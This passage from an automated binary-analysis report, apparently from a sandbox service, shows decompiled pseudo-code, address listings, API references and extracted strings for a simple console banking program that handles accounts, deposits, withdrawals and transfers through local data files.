                                                                      						_t128 = _t129 + 8;
                                                                      						if(_t98 == 0) {
                                                                      							_t99 = E00BE8230(0xc02f02,  &_v156);
                                                                      							_t128 = _t128 + 8;
                                                                      							if(_t99 == 0) {
                                                                      								_v12 = _v12 + 1;
                                                                      							}
                                                                      						}
                                                                      					}
                                                                      					_t111 =  *0xc02f28; // 0x0
                                                                      					_push(_t111);
                                                                      					E00BE6DB6(_t108, _t121, _t122, __eflags);
                                                                      					_t130 = _t129 + 4;
                                                                      					E00BE20E0(_t111, _t121, _t122, __eflags, _t148);
                                                                      					__eflags = _v12;
                                                                      					if(__eflags == 0) {
                                                                      						goto L10;
                                                                      					}
                                                                      					break;
                                                                      					L10:
                                                                      					E00BE12B0(0xa, 0xa);
                                                                      					_push(0xbffbf8);
                                                                      					E00BE715C(_t108, _t121, _t122, __eflags);
                                                                      					_t123 = _t130 + 4;
                                                                      					__eflags = 1;
                                                                      				} while (1 != 0);
                                                                      				E00BE8417(__eflags,  &_v80);
                                                                      				_t131 = _t130 + 4;
                                                                      				E00BE3AB0(_t108, _t121, _t122, _t148);
                                                                      				do {
                                                                      					E00BE20E0(_t111, _t121, _t122, __eflags, _t148);
                                                                      					E00BE12B0(0xf, 8);
                                                                      					_push("1. Create New Account\n");
                                                                      					E00BE715C(_t108, _t121, _t122, __eflags);
                                                                      					E00BE12B0(0xf, 0xa);
                                                                      					_push("2. Cash Deposit");
                                                                      					E00BE715C(_t108, _t121, _t122, __eflags);
                                                                      					E00BE12B0(0xf, 0xc);
                                                                      					_push("3. Cash Withdrawl");
                                                                      					E00BE715C(_t108, _t121, _t122, __eflags);
                                                                      					E00BE12B0(0xf, 0xe);
                                                                      					_push("4. Fund Transfer");
                                                                      					E00BE715C(_t108, _t121, _t122, __eflags);
                                                                      					E00BE12B0(0xf, 0x10);
                                                                      					_push("5. Account information");
                                                                      					E00BE715C(_t108, _t121, _t122, __eflags);
                                                                      					E00BE12B0(0x2d, 8);
                                                                      					_push("6. Transaction information");
                                                                      					E00BE715C(_t108, _t121, _t122, __eflags);
                                                                      					E00BE12B0(0x2d, 0xa);
                                                                      					_push("7. Log out");
                                                                      					E00BE715C(_t108, _t121, _t122, __eflags);
                                                                      					E00BE12B0(0x2d, 0xc);
                                                                      					_push("8. Exit");
                                                                      					E00BE715C(_t108, _t121, _t122, __eflags);
                                                                      					_t139 = _t131 + 0x20;
                                                                      					E00BE12B0(1, 0x11);
                                                                      					_v24 = 0;
                                                                      					while(1) {
                                                                      						__eflags = _v24 - 0x4e;
                                                                      						if(__eflags >= 0) {
                                                                      							break;
                                                                      						}
                                                                      						_push("_");
                                                                      						E00BE715C(_t108, _t121, _t122, __eflags);
                                                                      						_t139 = _t139 + 4;
                                                                      						_t111 = _v24 + 1;
                                                                      						__eflags = _t111;
                                                                      						_v24 = _t111;
                                                                      					}
                                                                      					E00BE12B0(0x17, 0x13);
                                                                      					_push("Press a choice between the range [1-8] ");
                                                                      					E00BE715C(_t108, _t121, _t122, __eflags);
                                                                      					_t131 = _t139 + 4;
                                                                      					_v16 = 0x30;
                                                                      					_v16 = _v16 - 1;
                                                                      					__eflags = _v16 - 7;
                                                                      					if(__eflags > 0) {
                                                                      						E00BE20E0(_t111, _t121, _t122, __eflags, _t148);
                                                                      						E00BE12B0(0xa, 0xa);
                                                                      						_push("Your input is out of range! Enter a choice between 1 to 8!");
                                                                      						E00BE715C(_t108, _t121, _t122, __eflags);
                                                                      						E00BE12B0(0xf, 0xc);
                                                                      						_push("Press any key to return to main menu...");
                                                                      						E00BE715C(_t108, _t121, _t122, __eflags);
                                                                      						_t131 = _t131 + 8;
                                                                      					} else {
                                                                      						switch( *((intOrPtr*)(_v16 * 4 +  &M00BE3A88))) {
                                                                      							case 0:
                                                                      								E00BE3DE0(_t108, _t111, _t121, _t122, __eflags, _t148);
                                                                      								goto L35;
                                                                      							case 1:
                                                                      								__eax = E00BE4640(__ebx, __ecx, __edi, __esi, __eflags, __fp0);
                                                                      								goto L35;
                                                                      							case 2:
                                                                      								__eax = E00BE49E0(__ebx, __ecx, __edi, __esi, __eflags, __fp0);
                                                                      								goto L35;
                                                                      							case 3:
                                                                      								__eax = E00BE4E90(__ebx, __edi, __esi, __eflags, __fp0);
                                                                      								goto L35;
                                                                      							case 4:
                                                                      								__eax = E00BE5600(__ebx, __ecx, __eflags, __fp0);
                                                                      								goto L35;
                                                                      							case 5:
                                                                      								__eax = E00BE6190(__ebx, __ecx, __edx, __fp0);
                                                                      								goto L35;
                                                                      							case 6:
                                                                      								E00BE20E0(__ecx, __edi, __esi, __eflags, __fp0) = E00BE12B0(0xf, 0xa);
                                                                      								_push("Are you sure you want to Log out? <Y/N> : ");
                                                                      								__eax = E00BE715C(__ebx, __edi, __esi, __eflags);
                                                                      								__esp = __esp + 4;
                                                                      								__ecx = _v5;
                                                                      								__eflags = __ecx - 0x59;
                                                                      								if(__eflags == 0) {
                                                                      									L28:
                                                                      									_t40 =  &_v36; // -15
                                                                      									_t40 = E00BE8417(__eflags, _t40);
                                                                      									 *0xc02f28 = E00BE6EF1("LOG.DAT", "a");
                                                                      									_t41 =  &_v36; // -15
                                                                      									__ecx = _t41;
                                                                      									_push(_t41);
                                                                      									_t42 =  &_v80; // -59
                                                                      									__edx = _t42;
                                                                      									_push(_t42);
                                                                      									_push(0xc02f40);
                                                                      									_push(0xc02ee0);
                                                                      									_push("%s %s %s %s\n");
                                                                      									__eax =  *0xc02f28; // 0x0
                                                                      									_push(__eax);
                                                                      									__eax = E00BE6F06(__ebx, __edi, __esi, __eflags);
                                                                      									__esp = __esp + 0x18;
                                                                      									__ecx =  *0xc02f28; // 0x0
                                                                      									_push(__ecx);
                                                                      									__eax = E00BE6DB6(__ebx, __edi, __esi, __eflags);
                                                                      									__esp = __esp + 4;
                                                                      									__eax = E00BE3610(__ebx, __edi, __esi, __fp0);
                                                                      								} else {
                                                                      									__edx = _v5;
                                                                      									__eflags = _v5 - 0x79;
                                                                      									if(__eflags == 0) {
                                                                      										goto L28;
                                                                      									}
                                                                      								}
                                                                      								goto L35;
                                                                      							case 7:
                                                                      								E00BE20E0(__ecx, __edi, __esi, __eflags, __fp0) = E00BE12B0(0xf, 0xa);
                                                                      								_push("Are you sure you want to exit? <Y/N> : ");
                                                                      								__eax = E00BE715C(__ebx, __edi, __esi, __eflags);
                                                                      								__esp = __esp + 4;
                                                                      								__edx = _v5;
                                                                      								__eflags = _v5 - 0x59;
                                                                      								if(__eflags == 0) {
                                                                      									L32:
                                                                      									_t45 =  &_v36; // -15
                                                                      									__ecx = _t45;
                                                                      									__eax = E00BE8417(__eflags, _t45);
                                                                      									 *0xc02f28 = E00BE6EF1("LOG.DAT", "a");
                                                                      									_t46 =  &_v36; // -15
                                                                      									__edx = _t46;
                                                                      									_push(_t46);
                                                                      									_t47 =  &_v80; // -59
                                                                      									__eax = _t47;
                                                                      									_push(_t47);
                                                                      									_push(0xc02f40);
                                                                      									_push(0xc02ee0);
                                                                      									_push("%s %s %s %s\n");
                                                                      									__ecx =  *0xc02f28; // 0x0
                                                                      									_push(__ecx);
                                                                      									__eax = E00BE6F06(__ebx, __edi, __esi, __eflags);
                                                                      									__esp = __esp + 0x18;
                                                                      									__edx =  *0xc02f28; // 0x0
                                                                      									_push(__edx);
                                                                      									__eax = E00BE6DB6(__ebx, __edi, __esi, __eflags);
                                                                      									__esp = __esp + 4;
                                                                      									__eax = E00BE77B1(0);
                                                                      								} else {
                                                                      									__eax = _v5;
                                                                      									__eflags = _v5 - 0x79;
                                                                      									if(__eflags == 0) {
                                                                      										goto L32;
                                                                      									}
                                                                      								}
                                                                      								goto L35;
                                                                      						}
                                                                      					}
                                                                      					L35:
                                                                      					__eflags = 1;
                                                                      				} while (1 != 0);
                                                                      				return 1;
                                                                      			}








































                                                                      0x00be3610
                                                                      0x00be3610
                                                                      0x00be3610
                                                                      0x00be3610
                                                                      0x00be3619
                                                                      0x00be361f
                                                                      0x00be3622
                                                                      0x00be3625
                                                                      0x00be3628
                                                                      0x00be362b
                                                                      0x00be362e
                                                                      0x00be3631
                                                                      0x00be3634
                                                                      0x00be3637
                                                                      0x00be363e
                                                                      0x00be3645
                                                                      0x00be364c
                                                                      0x00be3654
                                                                      0x00be365d
                                                                      0x00be3662
                                                                      0x00be3667
                                                                      0x00be3673
                                                                      0x00be3678
                                                                      0x00be367d
                                                                      0x00be368f
                                                                      0x00be369b
                                                                      0x00be36a0
                                                                      0x00be36a5
                                                                      0x00be36aa
                                                                      0x00be36b1
                                                                      0x00be36bc
                                                                      0x00be36bf
                                                                      0x00be36c3
                                                                      0x00be36c5
                                                                      0x00be36ce
                                                                      0x00be36d3
                                                                      0x00be36d8
                                                                      0x00be36e4
                                                                      0x00be36e9
                                                                      0x00be36ee
                                                                      0x00be36f3
                                                                      0x00be36f8
                                                                      0x00be36f8
                                                                      0x00be36fd
                                                                      0x00be370e
                                                                      0x00be3713
                                                                      0x00be3716
                                                                      0x00be371b
                                                                      0x00be3721
                                                                      0x00be3725
                                                                      0x00be372f
                                                                      0x00be3735
                                                                      0x00be373a
                                                                      0x00be3740
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00be374b
                                                                      0x00be3750
                                                                      0x00be3755
                                                                      0x00be3763
                                                                      0x00be3768
                                                                      0x00be376d
                                                                      0x00be3775
                                                                      0x00be3775
                                                                      0x00be376d
                                                                      0x00be3778
                                                                      0x00be377a
                                                                      0x00be3780
                                                                      0x00be3781
                                                                      0x00be3786
                                                                      0x00be3789
                                                                      0x00be378e
                                                                      0x00be3792
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00be3794
                                                                      0x00be3798
                                                                      0x00be379d
                                                                      0x00be37a2
                                                                      0x00be37a7
                                                                      0x00be37b3
                                                                      0x00be37b3
                                                                      0x00be37bf
                                                                      0x00be37c4
                                                                      0x00be37c7
                                                                      0x00be37cc
                                                                      0x00be37cc
                                                                      0x00be37d5
                                                                      0x00be37da
                                                                      0x00be37df
                                                                      0x00be37eb
                                                                      0x00be37f0
                                                                      0x00be37f5
                                                                      0x00be3801
                                                                      0x00be3806
                                                                      0x00be380b
                                                                      0x00be3817
                                                                      0x00be381c
                                                                      0x00be3821
                                                                      0x00be382d
                                                                      0x00be3832
                                                                      0x00be3837
                                                                      0x00be3843
                                                                      0x00be3848
                                                                      0x00be384d
                                                                      0x00be3859
                                                                      0x00be385e
                                                                      0x00be3863
                                                                      0x00be386f
                                                                      0x00be3874
                                                                      0x00be3879
                                                                      0x00be387e
                                                                      0x00be3885
                                                                      0x00be388a
                                                                      0x00be389c
                                                                      0x00be389c
                                                                      0x00be38a0
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00be38a2
                                                                      0x00be38a7
                                                                      0x00be38ac
                                                                      0x00be3896
                                                                      0x00be3896
                                                                      0x00be3899
                                                                      0x00be3899
                                                                      0x00be38b5
                                                                      0x00be38ba
                                                                      0x00be38bf
                                                                      0x00be38c4
                                                                      0x00be38c7
                                                                      0x00be38d4
                                                                      0x00be38d7
                                                                      0x00be38db
                                                                      0x00be3a43
                                                                      0x00be3a4c
                                                                      0x00be3a51
                                                                      0x00be3a56
                                                                      0x00be3a62
                                                                      0x00be3a67
                                                                      0x00be3a6c
                                                                      0x00be3a71
                                                                      0x00be38e1
                                                                      0x00be38e4
                                                                      0x00000000
                                                                      0x00be38eb
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00be38f5
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00be38ff
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00be3909
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00be3913
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00be391d
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00be3930
                                                                      0x00be3935
                                                                      0x00be393a
                                                                      0x00be393f
                                                                      0x00be3942
                                                                      0x00be3946
                                                                      0x00be3949
                                                                      0x00be3954
                                                                      0x00be3954
                                                                      0x00be3958
                                                                      0x00be3972
                                                                      0x00be3977
                                                                      0x00be3977
                                                                      0x00be397a
                                                                      0x00be397b
                                                                      0x00be397b
                                                                      0x00be397e
                                                                      0x00be397f
                                                                      0x00be3984
                                                                      0x00be3989
                                                                      0x00be398e
                                                                      0x00be3993
                                                                      0x00be3994
                                                                      0x00be3999
                                                                      0x00be399c
                                                                      0x00be39a2
                                                                      0x00be39a3
                                                                      0x00be39a8
                                                                      0x00be39ab
                                                                      0x00be394b
                                                                      0x00be394b
                                                                      0x00be394f
                                                                      0x00be3952
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00be3952
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00be39be
                                                                      0x00be39c3
                                                                      0x00be39c8
                                                                      0x00be39cd
                                                                      0x00be39d0
                                                                      0x00be39d4
                                                                      0x00be39d7
                                                                      0x00be39e2
                                                                      0x00be39e2
                                                                      0x00be39e2
                                                                      0x00be39e6
                                                                      0x00be3a00
                                                                      0x00be3a05
                                                                      0x00be3a05
                                                                      0x00be3a08
                                                                      0x00be3a09
                                                                      0x00be3a09
                                                                      0x00be3a0c
                                                                      0x00be3a0d
                                                                      0x00be3a12
                                                                      0x00be3a17
                                                                      0x00be3a1c
                                                                      0x00be3a22
                                                                      0x00be3a23
                                                                      0x00be3a28
                                                                      0x00be3a2b
                                                                      0x00be3a31
                                                                      0x00be3a32
                                                                      0x00be3a37
                                                                      0x00be3a3c
                                                                      0x00be39d9
                                                                      0x00be39d9
                                                                      0x00be39dd
                                                                      0x00be39e0
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00be39e0
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00be38e4
                                                                      0x00be3a74
                                                                      0x00be3a79
                                                                      0x00be3a79
                                                                      0x00be3a84

                                                                      APIs
                                                                        • Part of subcall function 00BE1380: _wprintf.LIBCMT ref: 00BE139D
                                                                        • Part of subcall function 00BE1380: _wprintf.LIBCMT ref: 00BE13DB
                                                                        • Part of subcall function 00BE1380: _wprintf.LIBCMT ref: 00BE13FC
                                                                        • Part of subcall function 00BE1380: _wprintf.LIBCMT ref: 00BE1470
                                                                        • Part of subcall function 00BE1380: _wprintf.LIBCMT ref: 00BE1493
                                                                        • Part of subcall function 00BE12B0: GetStdHandle.KERNEL32(000000F5,00000000,?,00BE1393,?,?,?,00BE1233), ref: 00BE12D1
                                                                        • Part of subcall function 00BE12B0: SetConsoleCursorPosition.KERNEL32(00000000,?,00BE1393,?,?,?,00BE1233), ref: 00BE12D8
                                                                      • _wprintf.LIBCMT ref: 00BE3667
                                                                      • _wprintf.LIBCMT ref: 00BE367D
                                                                        • Part of subcall function 00BE715C: __stbuf.LIBCMT ref: 00BE71A8
                                                                        • Part of subcall function 00BE715C: __output_s_l.LIBCMT ref: 00BE71C2
                                                                        • Part of subcall function 00BE715C: __ftbuf.LIBCMT ref: 00BE71D6
                                                                      • _wscanf.LIBCMT ref: 00BE368F
                                                                        • Part of subcall function 00BE738B: _vwscanf.LIBCMT ref: 00BE739C
                                                                      • _wprintf.LIBCMT ref: 00BE36A5
                                                                        • Part of subcall function 00BE12F0: _wprintf.LIBCMT ref: 00BE1329
                                                                      • _wprintf.LIBCMT ref: 00BE36D8
                                                                      • _wprintf.LIBCMT ref: 00BE3863
                                                                      • _wprintf.LIBCMT ref: 00BE3879
                                                                      • _wprintf.LIBCMT ref: 00BE38A7
                                                                        • Part of subcall function 00BE3DE0: _wprintf.LIBCMT ref: 00BE3E21
                                                                        • Part of subcall function 00BE3DE0: _wprintf.LIBCMT ref: 00BE3E54
                                                                        • Part of subcall function 00BE3DE0: _wprintf.LIBCMT ref: 00BE3E6C
                                                                        • Part of subcall function 00BE3DE0: _wscanf.LIBCMT ref: 00BE3E80
                                                                        • Part of subcall function 00BE3DE0: _wscanf.LIBCMT ref: 00BE3E94
                                                                        • Part of subcall function 00BE3DE0: _wprintf.LIBCMT ref: 00BE3EAA
                                                                        • Part of subcall function 00BE3DE0: _wscanf.LIBCMT ref: 00BE3EBB
                                                                        • Part of subcall function 00BE3DE0: _wprintf.LIBCMT ref: 00BE3ED1
                                                                        • Part of subcall function 00BE3DE0: _wscanf.LIBCMT ref: 00BE3EE2
                                                                      • _wprintf.LIBCMT ref: 00BE38BF
                                                                      • _wprintf.LIBCMT ref: 00BE36EE
                                                                        • Part of subcall function 00BE77B1: _doexit.LIBCMT ref: 00BE77BB
                                                                      • _swscanf.LIBCMT ref: 00BE3735
                                                                      • _wprintf.LIBCMT ref: 00BE37A2
                                                                      • __wstrtime.LIBCMT ref: 00BE37BF
                                                                      • _wprintf.LIBCMT ref: 00BE37DF
                                                                      • _wprintf.LIBCMT ref: 00BE37F5
                                                                      • _wprintf.LIBCMT ref: 00BE380B
                                                                      • _wprintf.LIBCMT ref: 00BE3821
                                                                      • _wprintf.LIBCMT ref: 00BE3837
                                                                      • _wprintf.LIBCMT ref: 00BE384D
                                                                        • Part of subcall function 00BE20E0: _wprintf.LIBCMT ref: 00BE20FF
                                                                        • Part of subcall function 00BE20E0: _wprintf.LIBCMT ref: 00BE213E
                                                                        • Part of subcall function 00BE20E0: _wprintf.LIBCMT ref: 00BE215F
                                                                        • Part of subcall function 00BE20E0: __wstrtime.LIBCMT ref: 00BE216C
                                                                        • Part of subcall function 00BE20E0: _wprintf.LIBCMT ref: 00BE2188
                                                                        • Part of subcall function 00BE20E0: __wstrtime.LIBCMT ref: 00BE2195
                                                                        • Part of subcall function 00BE20E0: _wprintf.LIBCMT ref: 00BE21C8
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.225676586.0000000000BE1000.00000020.00020000.sdmp, Offset: 00BE0000, based on PE: true
                                                                      • Associated: 00000000.00000002.225663040.0000000000BE0000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000000.00000002.225715561.0000000000BF8000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000000.00000002.225731360.0000000000BFF000.00000008.00020000.sdmp Download File
                                                                      • Associated: 00000000.00000002.225744873.0000000000C01000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000000.00000002.225752755.0000000000C05000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID: _wprintf$_wscanf$__wstrtime$ConsoleCursorHandlePosition__ftbuf__output_s_l__stbuf_doexit_swscanf_vwscanf
                                                                      • String ID: %s %s %s$%s %s %s %s$%s %s %s %s$0$1. Create New Account$2. Cash Deposit$3. Cash Withdrawl$4. Fund Transfer$5. Account information$6. Transaction information$7. Log out$8. Exit$Are you sure you want to Log out? <Y/N> : $Are you sure you want to exit? <Y/N> : $Enter User name : $LOG.DAT$LOG.DAT$N$Only THREE attempts shall be allowed to enter username and password.$Password : $Press ENTER to exit the program...$Press a choice between the range [1-8] $Press any key to return to main menu...$USER.DAT$Your input is out of range! Enter a choice between 1 to 8!
                                                                      • API String ID: 1611355571-1720101819
                                                                      • Opcode ID: 024ae8018a140aaeff9ea5399e75ce3ef49445916e903a3d2a4bbe4d57439e31
                                                                      • Instruction ID: cdcc38dca99fbaba93e8f43368d1ece73405317bbf21db68e821cc6e1125f998
                                                                      • Opcode Fuzzy Hash: 024ae8018a140aaeff9ea5399e75ce3ef49445916e903a3d2a4bbe4d57439e31
                                                                      • Instruction Fuzzy Hash: 6BA173B1E8438A6AE710BBE69C47FAD72E05F11B40F1041F5F6057A2C2EBB156488767
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 43%
                                                                      			E00BE49E0(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
                                                                      				char _v5;
                                                                      				char _v12;
                                                                      				intOrPtr _v16;
                                                                      				char _v28;
                                                                      				char _v32;
                                                                      				char _v36;
                                                                      				char _v40;
                                                                      				char _v42;
                                                                      				char _v62;
                                                                      				char _v112;
                                                                      				char _v113;
                                                                      				char _v125;
                                                                      				char _v140;
                                                                      				char _v170;
                                                                      				char _v200;
                                                                      				char _v208;
                                                                      				char _v244;
                                                                      				char _v324;
                                                                      				char _v376;
                                                                      				char _v456;
                                                                      				void* __ebp;
                                                                      				intOrPtr _t64;
                                                                      				intOrPtr _t70;
                                                                      				intOrPtr _t75;
                                                                      				void* _t76;
                                                                      				intOrPtr _t77;
                                                                      				void* _t81;
                                                                      				char _t97;
                                                                      				intOrPtr _t99;
                                                                      				void* _t104;
                                                                      				intOrPtr _t105;
                                                                      				intOrPtr _t110;
                                                                      				void* _t117;
                                                                      				void* _t122;
                                                                      				void* _t127;
                                                                      				intOrPtr _t147;
                                                                      				intOrPtr _t148;
                                                                      				intOrPtr _t168;
                                                                      				intOrPtr _t173;
                                                                      				void* _t177;
                                                                      				void* _t180;
                                                                      				void* _t184;
                                                                      				void* _t185;
                                                                      				void* _t193;
                                                                      				void* _t195;
                                                                      				void* _t196;
                                                                      				void* _t205;
                                                                      
                                                                      				_t215 = __fp0;
                                                                      				_t176 = __esi;
                                                                      				_t175 = __edi;
                                                                      				_t132 = __ecx;
                                                                      				_t131 = __ebx;
                                                                      				_v16 = 0;
                                                                      				E00BE20E0(__ecx, __edi, __esi, __eflags, __fp0);
                                                                      				E00BE12B0(5, 0xa);
                                                                      				_push("Withdraw from A/C number          : ");
                                                                      				E00BE715C(__ebx, __edi, __esi, __eflags);
                                                                      				E00BE738B("%s",  &_v28);
                                                                      				_t64 = E00BE6EF1("ACCOUNT.DAT", "r");
                                                                      				_t180 = _t177 + 0x14;
                                                                      				 *0xc02f28 = _t64;
                                                                      				_t214 = _v16;
                                                                      				if(_v16 == 0) {
                                                                      					E00BE20E0(_t132, __edi, __esi, _t214, __fp0);
                                                                      					E00BE12B0(0x14, 0xc);
                                                                      					_push("Given A/C number does not exits!");
                                                                      					return E00BE715C(__ebx, _t175, _t176, _t214);
                                                                      				}
                                                                      				E00BE12B0(0x32, 0xa);
                                                                      				_push( &_v376);
                                                                      				_push("[ %s ]");
                                                                      				E00BE715C(__ebx, __edi, __esi, __eflags);
                                                                      				E00BE12B0(5, 0xc);
                                                                      				_push("Amount to be Withdrawn (in NRs.)  : ");
                                                                      				E00BE715C(__ebx, _t175, _t176, __eflags);
                                                                      				E00BE738B("%f",  &_v12);
                                                                      				_t70 = E00BE6EF1("ACCOUNT.DAT", "r");
                                                                      				_t184 = _t180 + 0x1c;
                                                                      				 *0xc02f28 = _t70;
                                                                      				_v16 = 0;
                                                                      				while(1) {
                                                                      					_push( &_v32);
                                                                      					_push( &_v36);
                                                                      					_push( &_v40);
                                                                      					_push( &_v42);
                                                                      					_push( &_v140);
                                                                      					_push( &_v113);
                                                                      					_push( &_v62);
                                                                      					_push( &_v112);
                                                                      					_push( &_v125);
                                                                      					_push( &_v170);
                                                                      					_push( &_v200);
                                                                      					_t75 =  *0xc02f28; // 0x0
                                                                      					_t76 = E00BE7021(_t75, "%s %s %s %s %s %s %c %s %c %f %f %f\n",  &_v208);
                                                                      					_t185 = _t184 + 0x38;
                                                                      					__eflags = _t76 - 0xffffffff;
                                                                      					if(__eflags == 0) {
                                                                      						break;
                                                                      					}
                                                                      					_t122 = E00BE8230( &_v208,  &_v28);
                                                                      					_t184 = _t185 + 8;
                                                                      					__eflags = _t122;
                                                                      					if(__eflags == 0) {
                                                                      						asm("movss xmm0, [ebp-0x8]");
                                                                      						asm("comiss xmm0, [ebp-0x1c]");
                                                                      						if(__eflags > 0) {
                                                                      							E00BE20E0( &_v28, _t175, _t176, __eflags, _t215);
                                                                      							E00BE12B0(0x14, 0xc);
                                                                      							asm("cvtss2sd xmm0, [ebp-0x1c]");
                                                                      							asm("movsd [esp], xmm0");
                                                                      							_push("Sorry, the current balance is Rs. %.2f only!");
                                                                      							E00BE715C(_t131, _t175, _t176, __eflags);
                                                                      							E00BE12B0(0x19, 0xe);
                                                                      							_push("Transaction NOT completed!");
                                                                      							_t127 = E00BE715C(_t131, _t175, _t176, __eflags);
                                                                      							_v16 = 1;
                                                                      							return _t127;
                                                                      						}
                                                                      					}
                                                                      				}
                                                                      				_t77 =  *0xc02f28; // 0x0
                                                                      				_push(_t77);
                                                                      				E00BE6DB6(_t131, _t175, _t176, __eflags);
                                                                      				E00BE20E0( &_v200, _t175, _t176, __eflags, _t215);
                                                                      				E00BE12B0(0x1e, 0xa);
                                                                      				_push("Confirm Transaction");
                                                                      				_t81 = E00BE715C(_t131, _t175, _t176, __eflags);
                                                                      				asm("movss xmm0, [ebp-0x8]");
                                                                      				asm("movss [esp], xmm0");
                                                                      				E00BE1870(_t81,  &_v244);
                                                                      				E00BE12B0(3, 0xc);
                                                                      				_push( &_v376);
                                                                      				_push( &_v28);
                                                                      				E00BE715C(_t131, _t175, _t176, __eflags);
                                                                      				asm("cvtss2sd xmm0, [ebp-0x8]");
                                                                      				asm("movsd [esp], xmm0");
                                                                      				E00BE1B30( &_v456, "%s to be Withdrawn from A/C number : %s [%s]",  &_v244);
                                                                      				E00BE8140( &_v324,  &_v456);
                                                                      				E00BE8140( &_v324, "]");
                                                                      				E00BE12B0(0x28 - (E00BE82C0( &_v324) >> 1), 0xe);
                                                                      				_push( &_v324);
                                                                      				E00BE7229(_t131, _t175, _t176, __eflags);
                                                                      				E00BE12B0(8, 0x11);
                                                                      				_push("Are you sure you want to perform this tranasction? <Y/N>");
                                                                      				E00BE715C(_t131, _t175, _t176, __eflags);
                                                                      				_t193 = _t185 + 0x14 - 8 + 0x1c;
                                                                      				_t97 = _v5;
                                                                      				__eflags = _t97 - 0x59;
                                                                      				if(_t97 == 0x59) {
                                                                      					L10:
                                                                      					 *0xc02f28 = E00BE6EF1("ACCOUNT.DAT", "r");
                                                                      					_t99 = E00BE6EF1("TEMP.DAT", "w");
                                                                      					_t195 = _t193 + 0x10;
                                                                      					 *0xc02f24 = _t99;
                                                                      					_v16 = 0;
                                                                      					while(1) {
                                                                      						_push( &_v32);
                                                                      						_push( &_v36);
                                                                      						_push( &_v40);
                                                                      						_push( &_v42);
                                                                      						_push( &_v140);
                                                                      						_push( &_v113);
                                                                      						_push( &_v62);
                                                                      						_push( &_v112);
                                                                      						_push( &_v125);
                                                                      						_push( &_v170);
                                                                      						_push( &_v200);
                                                                      						_t168 =  *0xc02f28; // 0x0
                                                                      						_t104 = E00BE7021(_t168, "%s %s %s %s %s %s %c %s %c %f %f %f\n",  &_v208);
                                                                      						_t196 = _t195 + 0x38;
                                                                      						__eflags = _t104 - 0xffffffff;
                                                                      						if(__eflags == 0) {
                                                                      							break;
                                                                      						}
                                                                      						_t117 = E00BE8230( &_v208,  &_v28);
                                                                      						_t205 = _t196 + 8;
                                                                      						__eflags = _t117;
                                                                      						if(__eflags == 0) {
                                                                      							asm("movss xmm0, [ebp-0x24]");
                                                                      							asm("subss xmm0, [ebp-0x8]");
                                                                      							asm("movss [ebp-0x24], xmm0");
                                                                      						}
                                                                      						asm("movss xmm0, [0xbf8210]");
                                                                      						asm("comiss xmm0, [ebp-0x24]");
                                                                      						if(__eflags > 0) {
                                                                      							asm("movss xmm0, [ebp-0x20]");
                                                                      							asm("addss xmm0, [ebp-0x24]");
                                                                      							asm("movss [ebp-0x20], xmm0");
                                                                      							asm("movss xmm0, [0xbf8210]");
                                                                      							asm("movss [ebp-0x24], xmm0");
                                                                      						}
                                                                      						asm("movss xmm0, [ebp-0x24]");
                                                                      						asm("addss xmm0, [ebp-0x20]");
                                                                      						asm("movss [ebp-0x1c], xmm0");
                                                                      						asm("cvtss2sd xmm0, [ebp-0x1c]");
                                                                      						asm("movsd [esp], xmm0");
                                                                      						asm("cvtss2sd xmm0, [ebp-0x20]");
                                                                      						asm("movsd [esp], xmm0");
                                                                      						asm("cvtss2sd xmm0, [ebp-0x24]");
                                                                      						asm("movsd [esp], xmm0");
                                                                      						_push(_v42);
                                                                      						_push( &_v140);
                                                                      						_push(_v113);
                                                                      						_push( &_v62);
                                                                      						_push( &_v112);
                                                                      						_push( &_v125);
                                                                      						_push( &_v170);
                                                                      						_push( &_v200);
                                                                      						_push( &_v208);
                                                                      						_push("%s %s %s %s %s %s %c %s %c %.2f %.2f %.2f\n");
                                                                      						_t173 =  *0xc02f24; // 0x0
                                                                      						_push(_t173);
                                                                      						E00BE6F06(_t131, _t175, _t176, __eflags);
                                                                      						_t195 = _t205 - 0xfffffffffffffff8 + 0x44;
                                                                      					}
                                                                      					_t105 =  *0xc02f24; // 0x0
                                                                      					_push(_t105);
                                                                      					E00BE6DB6(_t131, _t175, _t176, __eflags);
                                                                      					_t147 =  *0xc02f28; // 0x0
                                                                      					_push(_t147);
                                                                      					E00BE6DB6(_t131, _t175, _t176, __eflags);
                                                                      					 *0xc02f28 = E00BE6EF1("TRANSACTION.DAT", "a");
                                                                      					E00BE8417(__eflags, 0xc02f30);
                                                                      					_push(0xc02ee4);
                                                                      					asm("cvtss2sd xmm0, [ebp-0x8]");
                                                                      					asm("movsd [esp], xmm0");
                                                                      					_push(0xc02f30);
                                                                      					_push(0xc02f40);
                                                                      					_push("Cash+Withdrawn");
                                                                      					_push( &_v28);
                                                                      					_push("%s %s %s %s %.2f %s\n");
                                                                      					_t110 =  *0xc02f28; // 0x0
                                                                      					_push(_t110);
                                                                      					E00BE6F06(_t131, _t175, _t176, __eflags);
                                                                      					_t148 =  *0xc02f28; // 0x0
                                                                      					_push(_t148);
                                                                      					E00BE6DB6(_t131, _t175, _t176, __eflags);
                                                                      					E00BE20E0(_t148, _t175, _t176, __eflags, _t215);
                                                                      					E00BE12B0(0x14, 0xc);
                                                                      					_push("Transaction completed successfully!");
                                                                      					return E00BE715C(_t131, _t175, _t176, __eflags);
                                                                      				}
                                                                      				__eflags = _v5 - 0x79;
                                                                      				if(_v5 == 0x79) {
                                                                      					goto L10;
